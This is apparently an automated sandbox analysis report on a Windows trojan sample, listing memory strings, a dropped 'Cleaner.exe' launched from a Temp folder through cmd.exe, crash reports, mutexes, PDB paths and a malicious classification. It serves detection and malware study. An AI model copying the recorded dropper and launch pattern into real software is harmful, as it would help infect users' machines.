 Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe Source: file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe Source: file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe Source: file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe Source: file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe Source: file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe Source: file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe Source: file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe Source: file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe Source: file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe Source: file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe Source: file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe Source: file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
 Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1] C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
 Source: Cleaner.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ Source: soft[1].0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
 Source: file.exe ReversingLabs: Detection: 47%
 Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
 Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 528 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 700 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 732 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 744 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 776 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 900 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 964 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1152 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1280 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe" Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1272 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Jump to behavior Source: C:\Users\user\Desktop\file.exe Process created: unknown unknown Jump to behavior Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe" Jump to behavior
 Source: Cleaner.lnk.0.dr LNK file: ..\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
 Source: classification engine Classification label: mal100.troj.winEXE@17/52@1/5
 Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5380 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_01
 Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
 Source: Binary string: [C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdbPXC-@ source: file.exe Source: Binary string: C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdb source: file.exe
 Source: Cleaner.exe.0.dr Static PE information: 0xEAE49AF1 [Wed Nov 17 16:40:17 2094 UTC]
 Source: initial sample Static PE information: section name: .text entropy: 7.920922021912582 Source: initial sample Static PE information: section name: .text entropy: 7.920922021912582